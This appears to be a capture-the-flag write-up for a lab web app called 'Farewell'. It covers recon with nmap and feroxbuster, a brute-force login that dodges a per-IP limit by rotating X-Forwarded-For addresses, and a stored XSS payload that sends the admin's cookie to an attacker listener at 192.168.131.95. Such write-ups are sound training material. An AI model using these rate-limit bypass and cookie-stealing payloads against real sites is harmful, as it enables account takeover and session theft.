Post

Farewell

Farewell

Farewell

๐Ÿ” Recon

First, I ran an nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-25 13:58 UTC
Nmap scan report for ip-10-82-129-222.eu-west-1.compute.internal (10.82.129.222)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 9e:fe:2f:f9:3c:82:7e:58:aa:ea:1c:fa:2e:fa:33:11 (ECDSA)
|_  256 18:dd:d6:b2:8c:1a:fa:0f:b3:96:1e:87:95:fc:15:42 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Farewell โ€” Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds

So itโ€™s all web-based as expected. I ran feroxbuster next:

1
feroxbuster -u http://10.82.129.222/ -x php,html,txt -a "Mozilla/5.0 (Linux; Android 12; PSD-AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"

Pasted image 20260625193312.png

๐Ÿ•ต๏ธ Auth Page & User Enumeration

Pasted image 20260625194606.png

๐Ÿ’ก This is the page โ€” you can see a notification bar at the top showing usernames:

1
2
3
adam posted a message - 3 hrs ago
deliver11 posted a message - 4 hrs ago
nora posted a message - 1 day ago

I tried logging in since the request goes to auth.php as seen in the recon: Pasted image 20260625194940.png

๐Ÿ”‘ It gives a hint for each user. The site also checks the IP, meaning weโ€™re limited to 10 attempts per IP. To bypass this, we can use the X-Forwarded-For header, but we need to rotate IPs. Here are the password hints:

1
2
3
adam      - favorite pet + 2 digits
deliver11 - Japan followed by 4 digits
nora      - lucky number 789

โšก Brute Force with IP Rotation

I generated a list of IPs using Python:

1
2
3
4
5
for num1 in range(0, 5):
  for num2 in range(1, 255):
    with open('ip.txt', 'a') as file:
      for i in range(0, 9):
        file.write(f'127.0.{num1}.{num2}\n')

And for the password wordlist:

1
crunch 9 9 numeric -t Tokyo%%%% > word.txt

๐Ÿ’ป I used Caido for the brute force: Pasted image 20260625203928.png

I found the password โ€” filter by response length and retry any rejected requests: Pasted image 20260625204207.png

And found the first flag!

๐Ÿ† Admin Flag

๐Ÿ“Œ I noticed comments getting approved on the page, so I tried XSS: Pasted image 20260625204402.png

Pasted image 20260625204536.png

As expected, normal tags donโ€™t work. Letโ€™s try to bypass the filter:

1
<img src='http://192.168.131.95:8080/test'>

Pasted image 20260625204627.png

โšก It works! Now letโ€™s steal the admin cookie. I used a technique similar to other challenges:

1
<body onload="new Image().src='http://192.168.131.95:8888?x='+document['coo'+'kie']">

And I got the cookie: Pasted image 20260625210206.png

Pasted image 20260625210504.png

๐Ÿ› ๏ธ Now logged in as admin. I remembered from the recon that there was an admin.php โ€” letโ€™s check it: Pasted image 20260625210559.png

Pasted image 20260625210923.png

๐Ÿ And now I got the real admin flag!

This post is licensed under CC BY 4.0 by the author.